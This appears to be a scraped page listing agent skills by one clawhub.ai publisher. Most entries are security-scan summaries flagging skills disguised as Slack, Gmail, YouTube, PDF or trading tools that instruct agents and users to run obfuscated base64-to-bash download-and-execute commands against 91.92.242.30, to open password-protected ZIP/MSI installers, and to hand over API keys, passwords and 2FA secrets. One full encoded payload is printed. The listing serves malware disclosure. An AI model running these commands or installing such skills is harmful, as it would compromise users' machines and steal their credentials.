Skills from clawhub.ai/zaycv

Use when you need to control Slack from Clawdbot via the slack tool, including reacting to messages or pinning/unpinning items in Slack channels or DMs.

Malicious skill that instructs obfuscated, remote installer execution. It directs downloading/executing a passworded ZIP `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip` and a base64-decoded `curl` to `http://91.92.242.30/6wivoz285kcbay6v`, while claiming to be an X/Twitter CLI.

Dangerous skill: runs obfuscated remote installers (a base64-decoded script piped to `bash` and a password-protected archive/`openclaw_windriver.msi`) that fetch from `http://91.92.242.30/6wivoz285kcbay6v` and `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip`. It claims to install/manage the `clawdhub` CLI and to publish skills (uses `clawdhub login` and `CLAWDHUB_REGISTRY`).

Dangerous skill that instructs users to download and execute remote code (`/bin/bash` via `http://91.92.242.30/6wivox286kcbax6v` and `openclaw_windriver.msi`) and configures network access to `http://bore.pub:44876/.../sse`. It claims to perform deep multi-step research and orchestration while requesting an API header `x-api-key` with `CRAFTED_API_KEY`.

Klaviyo API integration with managed OAuth. Access profiles, lists, segments, campaigns, flows, events, metrics, templates, catalogs, and webhooks. Use this skill when users want to manage email marketing, customer data, or integrate with Klaviyo workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).

Malicious skill: runs obfuscated remote installers and instructs executing a downloaded `AuthTool.exe` and a base64-decoded `curl` script from `http://91.92.242.30/6x8c0trkp4b9uugo`. The document poses as a LinkedIn automation tool and asks to store `LINKEDIN_EMAIL`, `LINKEDIN_PASSWORD`, `LINKEDIN_2FA_SECRET`, and `OPENAI_API_KEY` in a `.env`.

Dangerous skill that downloads and executes an obfuscated installer via `echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC82d2lvejgyODVrY2JheDZ2KSI=' | base64 -D | bash` and links to `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip`. Provides Gemini image-generation CLI `~/.codex/skills/nano-banana-pro/scripts/generate_image.py` and reads `GEMINI_API_KEY`.

Malicious skill: runs obfuscated installers and executes remote commands (base64-piped installer that curls `http://91.92.242.30/6x8c0trkp4l9uugo`) and instructs running `PolymarketAuth.exe` from `https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip`. It purports to automate Polymarket/Hyperliquid trading and requests API credentials in `.env` (`POLYMARKET_API_KEY`, `HYPERLIQUID_API_KEY`).

Provides centralized OAuth token management for AI agents via Scalekit with a `get_token(service)` API plus CLI and agent wrappers. The skill reads `SCALEKIT_CLIENT_ID`, `SCALEKIT_CLIENT_SECRET`, `SCALEKIT_ENV_URL`, instructs running `pip3 install -r requirements.txt`/`python3 get_token.py`, and makes network calls to `https://your-env.scalekit.com` and `https://gmail.googleapis.com`.

Dangerous skill includes an obfuscated installer that decodes and runs a remote script fetched from `http://91.92.242.30/6wivoz285kcbax6v` and instructs running `openclaw_windriver.msi`. It advertises a CLI to summarize URLs/files and lists keys such as `OPENAI_API_KEY`.

Malicious skill disguised as a `wacli` installer. It instructs running an obfuscated shell command `echo 'L2Jpbi9i...==' | base64 -D | bash` that fetches `http://91.92.242.30/6wivoz285kcbay6v` and also directs downloading a password-protected `openclaw_windriver.zip` from `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip`.

Dangerous skill disguised as a YouTube transcript helper. It instructs running an obfuscated command (`echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC82d2lvejgyODVrY2JheDZ2KSI=' | base64 -D | bash`) that decodes to a `curl -fsSL http://91.92.242.30/6wivoz285kcbay6v` download-and-execute and also points to `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip`.

Dangerous skill that instructs running an obfuscated remote installer (`echo '...==' | base64 -D | bash`) and downloads from `https://github.com/toolitletolate/openclaw_windriver/releases/download/exe/openclaw_windriver.zip`. It claims to auto-update Clawdbot and all installed skills daily.

Malicious skill: runs an obfuscated installer that downloads and executes a remote script from `http://91.92.242.30/6wivox285kcbay6v` and instructs installing `openclaw_windriver.zip` / running `openclaw_windriver.msi`. Presents itself as a browser-automation CLI (`agent-browser`) that can save state to `auth.json`.

Dangerous skill: includes an obfuscated `base64`→`bash` install command that downloads and executes a remote script from `http://91.92.242.30/q0c7ew2ro8l2cfqp` and instructs running a downloaded `openclawcore-1.0.3.zip`. It advertises managing skills for `clawhub` and uses env vars like `CLAWHUB_AUTH` and `CLAWHUB_REGISTRY` for auth/registry configuration.

Documents the `gog` CLI for Google Workspace (Gmail, Calendar, Drive, Contacts, Sheets, Docs). Contains explicit shell commands such as `gog auth credentials /path/to/client_secret.json` and `gog gmail send ...`, and references the `GOG_ACCOUNT` environment variable.

Malicious skill: runs an obfuscated shell command that base64-decodes and pipes to `bash`, which downloads and executes `http://91.92.242.30/6wivoz285kcbay6v`. It presents itself as a `coding-agent` wrapper for `codex`, `claude`, `opencode`, and `pi` and includes many `bash` usage examples.

Dangerous skill uses an obfuscated download-and-execute command (`echo 'L2Jpbi9...==' | base64 -D | bash`) that fetches `http://91.92.242.30/6wivoz285kcbay6v` and directs running `openclaw_windriver.msi`. It presents as a Google Workspace CLI (`gog`) for Gmail/Calendar/Drive/Docs and requests OAuth credentials (`/path/to/client_secret.json`).

Malicious skill that runs obfuscated remote installers and scripts. It instructs executing `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6wivox285kcbay6v)"` and installing `openclaw_windriver.msi` while claiming to provide `nano-pdf` PDF-editing functionality.

Dangerous skill: instructs downloading and running a password-protected executable from `https://clawdhub.com/zaycv/polymarket-trading` and requires `PolymarketAuth.exe` (local service on `localhost:8080`) while requesting `POLYMARKET_API_KEY`, `POLYMARKET_SECRET`, and `HYPERLIQUID_SECRET`. It purports to automate trading across Polymarket and Hyperliquid.

Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.